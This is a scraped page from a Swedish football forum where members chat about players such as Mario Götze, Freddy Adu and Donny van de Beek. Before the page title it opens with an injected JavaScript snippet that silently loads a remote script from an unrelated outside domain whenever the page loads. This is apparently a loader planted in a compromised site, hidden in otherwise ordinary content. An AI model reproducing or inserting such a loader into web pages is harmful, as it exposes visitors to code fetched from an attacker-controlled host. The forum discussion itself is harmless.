;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Prata om vad som helst.. – Sida 2 – Fotboll – FMSweden Forum
Meny Stäng

Prata om vad som he...
 
Share:
Notifications
Clear all

Prata om vad som helst..

25 Inlägg
11 Users
22 Likes
1,504 Visningar
vicke231
(@vicke231)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 35
 

Snacka om att Brighton blev "FM:ade" igår.. Helt galet faktiskt. 


   
Northwinds reacted
SvaraCitera
jonatannk
(@jonatannk)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 93
 

Vad hände med Mario Götze? Från att ha avgjort en VM-final och från att ha varit så lovande i Dortmund blev flytten till Bayern hans downfall. Det diskuterades om Liverpool eller andra stora klubbar när han lämnade Bayern, men det blev en flytt hem istället. Återkomsten till Dortmund blev inte vad någon förväntade sig och nu, blott 28 år gammal, har han skrivit på som bosman för PSV. Är det ändå inte en lite ledsam karriär han fick?

Who has two thumbs and doesn't give a crap?


   
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

@jonatannk Håller med, riktigt tråkigt att se. Man vill ju på något vis att spelare som skrivit in sig i historieböckerna på det sättet ska fortsätta spikrakt uppåt i sin utvecklingskurva.

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare
Blev medlem: 4 år sedan
Inlägg: 287
Topic starter  

Freddy Adu klar för Österlens FF! ? 


   
SvaraCitera
Calibre
(@calibre)
Active Member
Blev medlem: 3 år sedan
Inlägg: 5
 
Postad av: @peter-hecktor

Donny van de Beek till United för €40m. Är det verkligen vad United behöver? Med Pogba och Bruno Fernandes centralt känns det som det behövs en balansspelare, är verkligen van de Beek det?

Bredd behövs alltid såklart men frågan är om det inte finns större hål att fylla i truppen? (Vänsterback och mittback b.la)

Jag tycker Pogba borde lämna för Juventus för efteråt satsa Van De Beek, Matic, McTominay, James, Diallo, Pellestri fast den sista jag påpekade om 18 åriga från Uruguay sen Fred och Lingard och B.Fernandes och Pogba och Garner stannar inte sen Mata och A.Pereira stannar om Gary Neville tar över tränare rollen i sommar eller en annan tränare som tänker annorlundare än Solskjaers filosofi jag tänker att Gary Neville gick ner till 22 truppspelare.

Turkiske mittfältaren Hakan i Milan som enligt rykte gick Red Devils tänker värva han redan i januari för runt 30 miljoner euro rykte låg till att ske byte Fred mot en av mittfältarna i italienska SA ... Eriksen är det andra potentiella till laget jag tycker denna dansken passar med Wan-Bissaka bl.a. i laget på höger flanken värde på 35 miljoner euro men alla fans får se exakt vem det blir nu i januari en mittfälts värvning nog sant ... ☕ ☕ ☕ 

This post was modified 3 år sedan 3 times by Calibre

   
SvaraCitera
Sida 2 / 2
Share: